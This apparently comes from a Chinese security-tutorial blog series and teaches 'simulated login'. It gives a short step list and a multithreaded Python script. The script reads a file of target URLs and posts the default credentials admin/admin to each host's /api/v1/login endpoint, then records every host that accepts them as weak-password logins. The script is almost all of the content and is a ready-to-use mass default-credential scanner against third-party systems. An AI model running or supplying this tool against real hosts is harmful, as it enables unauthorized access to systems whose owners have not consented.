【网络安全带你练爬虫-100练】第15练:模拟用户登录

目录

一、目标1:理清逻辑

二、目标2:将每一步用代码进行表示

三、网络安全O


一、目标1:理清逻辑

模拟登录的基本流程

1、进入入口程序

2、读取目标URL

3、请求加上线程

4、确定请求数据包

5、请求格式的确认

6、数据的处理与判断



二、目标2:将每一步用代码进行表示

(顺序会进行标号)

对于不同的站点的登录

需要对数据包、请求格式、逻辑处理等进行适当的修改

admin_login.py

python 复制代码
​import csv
import requests
import threading


def admin_login(urls):
#④确定请求数据包
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.79',
        'Content-Type': 'application/json',
    }

    data = {
        "accessKey": "admin",
        "secretKey": "admin"
    }

    try:
#⑤请求格式的确认
        res = requests.post(url=urls, headers=headers, json=data, timeout=60)
#⑥数据的处理与判断
        if res.status_code == 204:
            print(f"\033[32m[+]{urls} is 弱口令登录!\033[0m")
            with open('ip_login.csv', mode='a', encoding='utf-8', newline='') as f:
                csv_w = csv.writer(f)
                csv_w.writerow([urls])
        else:
            print(f"\033[34m[-]{urls} pass.\033[0m")
    except Exception as e:
        print("错误为"+str(e))


#①进入入口程序
if __name__ == '__main__':
    threads = []
#②读取目标URL
    with open("ips.csv", mode="r") as f:
        for u in f:
            url = u.replace("\n", "")
            urls = url + "/api/v1/login"
#③函数请求加上线程
            thread = threading.Thread(target=admin_login, args=(urls,))
            thread.start()
            threads.append(thread)

    for thread in threads:
        thread.join()


​


三、网络安全O

README.md · 书半生/网络安全知识体系-实战中心 - 码云 - 开源中国 (gitee.com)https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledgehttps://github.com/BLACKxZONE/Treasure_knowledge

相关推荐
智灵鸟科技11 分钟前
封闭网络怎么安全地接外部能力:三条通道穷举、威胁封堵矩阵与残余风险
网络·安全·矩阵
祁白_40 分钟前
sqlmap工具
web安全·网络安全·sql注入·sqlmap
HackTwoHub2 小时前
等级保护现场测评系统重磅更新,支持 AI 接入,可录入全品类资产清单,自动化巡检核查,批量导出测评归档文件
运维·人工智能·安全·web安全·网络安全·自动化·系统安全
川石课堂软件测试2 小时前
安全测试|服务器安全加固方法
服务器·功能测试·测试工具·jmeter·mysql·web安全·单元测试
Sagittarius_A*3 小时前
Command Injection 命令注入漏洞:系统命令拼接缺陷与执行利用技术
网络·安全·web安全·dvwa·命令注入漏洞
武子康3 小时前
Hugging Face AI 驱动入侵真正暴露的是 Dataset Processing 信任边界(攻击链 + 三层隔离 + 行动清单)
人工智能·安全·llm
Android洋芋4 小时前
漏洞挖掘与赏金攻略
网络·安全·web安全
数据知道5 小时前
SDN 与软件定义网络的安全边界在哪里?
网络·安全·网络安全
数据知道5 小时前
VLAN 与安全隔离:从配置错误到 VLAN Hopping 攻击
网络·安全·网络安全·智能路由器
Sagittarius_A*5 小时前
Open HTTP Redirect 开放重定向漏洞:URL 跳转校验缺陷与绕过技术
网络·安全·web安全·http·dvwa·burp suite